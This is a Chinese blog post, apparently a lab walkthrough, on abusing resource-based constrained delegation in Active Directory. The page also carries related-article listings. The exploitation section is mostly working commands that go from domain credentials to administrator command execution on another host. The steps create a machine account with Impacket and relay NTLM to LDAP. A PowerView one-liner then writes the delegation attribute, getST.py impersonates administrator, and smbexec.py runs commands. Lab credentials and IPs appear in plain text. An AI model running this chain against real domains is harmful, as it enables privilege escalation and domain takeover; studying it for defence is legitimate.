基于资源的约束委派(RBCD)学习

最新推荐文章于 2024-06-02 15:21:42 发布
最新推荐文章于 2024-06-02 15:21:42 发布
阅读量2.8k 收藏 3
点赞数
分类专栏: 内网蠕动 漏洞分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/118928824
版权

基于资源的约束委派(RBCD)学习

原理

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。
这里的关键就是谁可以修改属性

REDTEAM\web3user -> WriteProperty(将机器加入域的账号,也就是mS-DS-CreatorSID属性中的账户)
NT AUTHORITY\SELF -> WriteProperty(机器账户自身也可以修改)
我们再回顾一个知识点,默认域控的ms-DS-MachineAccountQuota属性设置允许所有域用户向一个域添加多达10个计算机帐户,就是说只要有一个域凭据就可以在域内任意添加机器账户。这个凭据可以是域内的用户账户、服务账户、机器账户。

具体可以参考ateam的文章
微软不认的“0day”之域内本地提权-烂番茄

环境搭建

主机机器名ip用户密码版本
域控ad.test.com192.168.164.147administratorAa1234win2012r2
域内机器user.test.com192.168.164.129user1Uu1234.win2008r2
域内机器user2.test.com192.168.164.150user2未知win2008r2

利用

查询账户创建的机器账户

ldapsearch -x -H ldap://192.168.164.146 -D "user1@test.com" -b "DC=test,DC=com" -w Uu1234. "(&(sAMAccountName=user1)(objectClass=user))"|grep objectSid

ldapsearch -x -H ldap://192.168.164.146 -D "user1@test.com" -b "DC=test,DC=com" -w Uu1234. "(&(sAMAccountName=*)(objectClass=computer)(mS-DS-CreatorSID=S-1-5-21-1476105802-4187504772-1115168634-1107))"

添加机器账户

  1. 如果有一个域账户
python3 addcomputer.py -method SAMR -dc-ip 192.168.164.147 -computer-name rbcd -computer-pass 123456 "test.com/user1:Uu1234."

在这里插入图片描述
在这里插入图片描述

  1. 通过中继添加
    使用ntlm中继,前提是需要域控开启ldaps
    在这里插入图片描述
    参考https://www.cnblogs.com/alfredinchange/p/13691748.html
python3 ntlmrelayx.py -t ldaps://ad.test.com --add-computer

在这里插入图片描述

这里显示链接ladps错误,ssl错误,但是使用addcomputer脚本指定ldaps时未错误,原因未知
在这里插入图片描述

中继&委派

无另一台机器权限

python3 ntlmrelayx.py -t ldap://ad.test.com -debug --delegate-access --escalate-user rbcd\$

这里我使用http请求输入账户密码来触发,但是只能获取域内信息,无法修改属性,使用域账户连接ldap无问题,待解决

有另一台机器权限

使用powerview.ps1

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

查找用户sid

powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-DomainComputer -Identity rbcd -Properties objectsid}"

在这里插入图片描述

powershell.exe -exec bypass -Command "Import-Module .\powerview.ps1;$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1476105802-4187504772-1115168634-1110)\";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer USER2 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose"

在这里插入图片描述
获取服务票据

python3 getST.py -dc-ip 192.168.164.147 test/rbcd\$:123456 -spn cifs/user2.test.com -impersonate administrator

在这里插入图片描述

export KRB5CCNAME=administrator.ccache
python3 smbexec.py -no-pass -k user2.test.com

在这里插入图片描述

参考文章

https://blog.ateam.qianxin.com/post/wei-ruan-bu-ren-de-0day-zhi-yu-nei-ben-di-ti-quan-lan-fan-qie/
https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/
https://xz.aliyun.com/t/8690#toc-69
https://xz.aliyun.com/t/7454

whojoe
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于资源约束委派攻击
good good study
04-13 2105
基于资源约束委派 (RBCD:Resource Based Constrained Delegation):为了使⽤户/资源更加独⽴,微软在Windows Server 2012中引⼊了基于资源约束委派。基于资源约束委派不需要域管理员权限去设置,⽽把设置属性的权限赋予给了机器⾃身。 配置了基于资源约束委派的账户的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的值为被允许基于资源约束委派的账号的SID。如admin--pc的 msDS-AllowedT
【域权限维持】-基于资源约束委派RBCD
qq_41617902的博客
01-20 836
基于资源约束委派RBCD
域内攻击--->基于资源约束委派(RBCD)
最新发布
huohaowen的博客
06-02 729
基于资源约束委派RBCD他来啦~~~!!!
基于资源约束委派
mingyqf的博客
02-23 827
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
Kerberos 域委派攻击之基于资源约束委派
Adminxe的博客
03-06 623
CSDN自动迁移博客文章注意区别:约束委派 不能跨域进行委派,基于资源约束委派可以跨域和林如果约束委派,必须拥有权限,该特权是敏感的,通常仅授予域管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源约束委派。基于资源约束委派不需要域管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源约束委派允许资源配置受信任的帐户委派给他们。基于资源约束委派只能在运行 ·Windows Server 2012 及以上的域控制器·上配置,
域渗透之委派利用方式(详细)
weixin_65550121的博客
12-08 929
如下图:客户端想要访问www.xxxx.com,这个网站去下载一个文件,而文件在文件服务器上面,这时候客户端无法直接拿到这个文件,所以就委托HTTP服务器帮客户端把文件文件拿到,然后给客户端。这里提到了一个关键词是委托,说的简单点就是比如说自己手里有点事走不开,但是自己饿了,想吃饭,所以我把钱给我同事,并且委托我同事去帮忙买个饭,店里将饭做好之后交给我同事,然后我同事交给我。
rbcd-attack:使用Impacket从外部进行基于Kerberos资源约束委派攻击
04-01
滥用基于Kerberos资源约束委派 TL; DR 此存储库是针对Windows Active Directory域中针对Kerberos资源约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是...
智能制造-博世(RBCD)供应商8D培训.pdf
09-25
智能制造-博世(RBCD)供应商8D培训.pdf
【推荐】智能制造(工业4.0)与MES资料合集.zip
09-25
智能制造-博世(RBCD)供应商8D培训 智能制造-精益生产之多能工管理 智能制造:美的集团如何运用VMI做库存管理 智能制造之SOP标准作业程序:一文认识SOP 二、MES 工业4.0和MES发展 上汽大众发劢机厂MES系统规划不...
connect-rb:连接Ruby SDK
05-16
安装与Bundler一起安装 gem 'connect_client'bundle install从RubyGems安装 ...建造要构建并在本地运行: git clone https://github.com/getconnect/connect-rb connect-rbcd connect-rbbundle installbundle exec rake
域内渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 2554
域渗透约束委派的利用
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
内网安全:非约束委派 约束委派 资源约束委派
qq_61553520的博客
01-28 1612
实验靶场:redteam.red。
RBCD深度利用之“烂番茄”
Jinmindong
02-09 533
本篇文章是在基于资源约束委派的基础上的一个利用,篇幅会比较短,但个人认为利用面还是挺广泛的。于是就写一下。首先,需要了解的是RBCD的基础知识:基于资源约束委派(RBCD)只支持2012及2012以上,它与非约束委派约束委派有个一个很大的区别,就是不需要管理员去单独配置。RBCD把设置的权限给了计算机本身,那么,既计算机本身可以决定‘我’可以委派谁来控制我,换句话说就是计算机自身可以直接在自己账户上配置msDS-
约束委派攻击
blue_fantasy的博客
01-25 4007
Text. 0x00 原理 回顾 首先回顾一下什么是委派? 服务/用户 主机名 用户A hostA 服务B hostB 服务C hostC 委派就是用户A委派主机hostB上的服务代表自己去访问了主机hostC上的服务C,委派需要提前在域控上进行配置,它可以理解成是一种权限。 约束委派原理 由于⾮约束委派的不安全性(配置了⾮约束
内网横向移动—非约束委派&约束委派
剁椒鱼头没剁椒的博客
08-01 715
在Windows 2000 Server首次发布Active Directory时,Microsoft必须提供一种简单的机制来支持用户通过kerberos向web server进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为"kerberos双跳问题",并且要求进行委派,以便web server在修改数据库记录时模拟用户。
域渗透——基于资源约束委派利用
a3320315的博客
07-03 1829
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 委派的域内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24 域内普通用户: test,对win2008有写的权限 域内普通用户: test1 攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1 设置test的写权限 验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举w
域渗透委派攻击之约束委派
Longwaer
01-24 1123
学习委派攻击之约束委派原理,更多的去了解与非约束委派之前的区别,更快的掌握内网技术。
基于windows中委派的攻击思路(下)-基于资源约束委派
热门推荐
Shanfenglan's blog
12-16 3万+
文章目录1. 前言2. 技术点2.1 利用原理:那么如何获得一个机器账户呢?如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity?3. 利用过程:1. 利用powermad添加机器账户:2. 查询添加的机器账户的sid3. 修改msDS-AllowedToActOnBehalfOfOtherIdentity:3.1 win server 2012以上:3.2 win server 2012以下:4. 利用rubues获取票据5.利用impacket 1. 前
滥用基于资源约束委派来攻击Active Directory
weixin_30530523的博客
03-15 457
0x00 前言 早在2018年3月前,我就开始了一场毫无意义的争论,以证明TrustedToAuthForDelegation属性是无意义的,并且可以在没有该属性的情况下实现“协议转换”。我相信,只要一旦启用约束委派(msDS-AllowedToDelegateTo不为空),它是否配置为使用“仅Kerberos”或“任何身份验证协议”并起作用。 我在Benjamin Delpy(@genti...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值